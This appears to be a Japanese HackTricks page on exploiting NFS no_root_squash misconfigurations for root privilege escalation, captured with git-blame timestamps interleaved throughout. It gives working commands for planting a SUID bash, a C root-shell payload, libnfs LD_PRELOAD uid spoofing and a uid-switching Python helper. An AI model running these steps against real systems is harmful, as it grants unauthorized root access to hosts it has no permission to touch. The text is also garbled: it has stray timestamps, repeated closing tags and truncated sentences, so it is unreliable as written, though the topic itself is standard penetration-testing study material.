2024-07-19 04:03:05 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 04:03:05 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 04:03:05 +00:00
< summary > Support HackTricks< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 04:03:05 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 04:03:05 +00:00
{% endhint %}
{% endhint %}
{% endhint %}
{% endhint %}
{% endhint %}
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-07-19 04:03:05 +00:00
_ ** /etc/exports** _ ファイルを読み、**no\_root\_squash**として設定されているディレクトリが見つかった場合、**クライアントとして**それに**アクセス**し、そのディレクトリの中に**ローカルの**マシンの**root**のように**書き込む**ことができます。
2020-07-15 15:43:14 +00:00
2024-07-19 04:03:05 +00:00
**no\_root\_squash**: このオプションは基本的に、クライアントのrootユーザーにNFSサーバー上のファイルにrootとしてアクセスする権限を与えます。これにより、深刻なセキュリティ上の問題が生じる可能性があります。
2020-07-15 15:43:14 +00:00
2024-07-19 04:03:05 +00:00
**no\_all\_squash:** これは**no\_root\_squash**オプションに似ていますが、**非rootユーザー**に適用されます。例えば、nobodyユーザーとしてシェルを持ち、/etc/exportsファイルを確認し、no\_all\_squashオプションが存在し、/etc/passwdファイルを確認し、非rootユーザーをエミュレートし、そのユーザーとしてsuidファイルを作成( )
2020-07-15 15:43:14 +00:00
2024-07-19 04:03:05 +00:00
# Privilege Escalation
2020-07-28 14:39:27 +00:00
2024-07-19 04:03:05 +00:00
## Remote Exploit
2020-07-15 15:43:14 +00:00
2024-02-07 05:47:12 +00:00
この脆弱性を見つけた場合、次のように悪用できます:
2020-07-15 15:43:14 +00:00
2024-07-19 04:03:05 +00:00
* **そのディレクトリを**クライアントマシンに**マウントし、rootとして**マウントされたフォルダ内に**/bin/bash**バイナリをコピーし、**SUID**権限を与え、**被害者**マシンからそのbashバイナリを実行します。
2020-07-15 15:43:14 +00:00
```bash
#Attacker, as root user
mkdir /tmp/pe
mount -t nfs < IP > :< SHARED_FOLDER > /tmp/pe
cd /tmp/pe
cp /bin/bash .
chmod +s bash
#Victim
cd < SHAREDD_FOLDER >
./bash -p #ROOT shell
```
2024-07-19 04:03:05 +00:00
* **クライアントマシンでそのディレクトリをマウントし、** マウントされたフォルダ内に **rootとして** SUID権限を悪用するコンパイル済みペイロードをコピーし、それに **SUID** 権限を与え、**被害者** マシンからそのバイナリを **実行** します(ここにいくつかの[C SUIDペイロード](payloads-to-execute.md#c)があります)。
2020-07-15 15:43:14 +00:00
```bash
#Attacker, as root user
gcc payload.c -o payload
mkdir /tmp/pe
mount -t nfs < IP > :< SHARED_FOLDER > /tmp/pe
cd /tmp/pe
cp /tmp/payload .
chmod +s payload
#Victim
cd < SHAREDD_FOLDER >
./payload #ROOT shell
```
2024-07-19 04:03:05 +00:00
## Local Exploit
2020-07-28 14:39:27 +00:00
{% hint style="info" %}
2024-07-19 04:03:05 +00:00
注意してください、もしあなたが**あなたのマシンから被害者のマシンへのトンネルを作成できるなら、必要なポートをトンネリングしてこの特権昇格を悪用するためにリモートバージョンを使用することができます**。\
次のトリックは、ファイル`/etc/exports`が**IPを示している場合**です。この場合、**リモートエクスプロイトを使用することはできず**、**このトリックを悪用する必要があります**。\
エクスプロイトが機能するためのもう一つの必要条件は、**`/etc/export`内のエクスポートが`insecure`フラグを使用していること**です。\
\--_もし`/etc/export`がIPアドレスを示している場合、このトリックが機能するかどうかはわかりません_--
2020-07-28 14:39:27 +00:00
{% endhint %}
2024-07-19 04:03:05 +00:00
## Basic Information
2020-07-28 14:39:27 +00:00
2024-07-19 04:03:05 +00:00
このシナリオは、ローカルマシン上のマウントされたNFS共有を悪用し、クライアントが自分のuid/gidを指定できるNFSv3仕様の欠陥を利用して、無許可のアクセスを可能にします。悪用には、NFS RPCコールの偽造を可能にするライブラリ[libnfs](https://github.com/sahlberg/libnfs)を使用します。
2020-07-28 14:39:27 +00:00
2024-07-19 04:03:05 +00:00
### Compiling the Library
2020-07-28 14:39:27 +00:00
2024-02-07 05:47:12 +00:00
ライブラリのコンパイル手順は、カーネルバージョンに基づいて調整が必要な場合があります。この特定のケースでは、fallocateシステムコールがコメントアウトされていました。コンパイルプロセスには、次のコマンドが含まれます:
2020-07-28 14:39:27 +00:00
```bash
2020-08-28 13:26:57 +00:00
./bootstrap
./configure
make
gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/
2020-07-28 14:39:27 +00:00
```
2024-02-07 05:47:12 +00:00
### 攻撃の実行
2020-07-28 14:39:27 +00:00
2024-07-19 04:03:05 +00:00
この攻撃は、特権をルートに昇格させ、シェルを実行するシンプルなCプログラム( )
2024-02-03 16:28:32 +00:00
2024-02-07 05:47:12 +00:00
1. **攻撃コードをコンパイルする:**
2020-07-28 14:39:27 +00:00
```bash
cat pwn.c
int main(void){setreuid(0,0); system("/bin/bash"); return 0;}
gcc pwn.c -o a.out
```
2024-02-03 16:28:32 +00:00
2024-07-19 04:03:05 +00:00
2. **攻撃を共有に配置し、uidを偽装してその権限を変更する:**
2024-02-03 16:28:32 +00:00
```bash
2020-08-28 13:26:57 +00:00
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out
2020-07-28 14:39:27 +00:00
```
2020-07-15 15:43:14 +00:00
2024-07-19 04:03:05 +00:00
3. **攻撃を実行してルート権限を取得する:**
2024-02-03 16:28:32 +00:00
```bash
/mnt/share/a.out
#root
```
2020-08-28 13:26:57 +00:00
2024-07-19 04:03:05 +00:00
## ボーナス: NFShellによるステルスファイルアクセス
ルートアクセスを取得した後、所有権を変更せずにNFS共有と対話するために( ) ( )
2020-08-28 13:26:57 +00:00
```python
#!/usr/bin/env python
2024-02-03 16:28:32 +00:00
# script from https://www.errno.fr/nfs_privesc.html
2020-08-28 13:26:57 +00:00
import sys
import os
def get_file_uid(filepath):
2023-07-07 23:42:27 +00:00
try:
uid = os.stat(filepath).st_uid
except OSError as e:
return get_file_uid(os.path.dirname(filepath))
return uid
2020-08-28 13:26:57 +00:00
filepath = sys.argv[-1]
uid = get_file_uid(filepath)
os.setreuid(uid, uid)
os.system(' '.join(sys.argv[1:]))
```
2024-07-19 04:03:05 +00:00
実行するには:
2024-02-03 16:28:32 +00:00
```bash
# ll ./mount/
2020-08-28 13:26:57 +00:00
drwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old
```
2024-07-19 04:03:05 +00:00
{% hint style="success" %}
AWSハッキングを学び、実践する: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCPハッキングを学び、実践する: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-02-03 16:28:32 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-07-19 04:03:05 +00:00
< summary > HackTricksをサポートする< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 04:03:05 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )を確認してください!
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**をフォローしてください。**
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 04:03:05 +00:00
{% endhint %}
< / details >
{% endhint %}
< / details >
{% endhint %}
< / details >
{% endhint %}
< / details >
{% endhint %}
< / details >
{% endhint %}
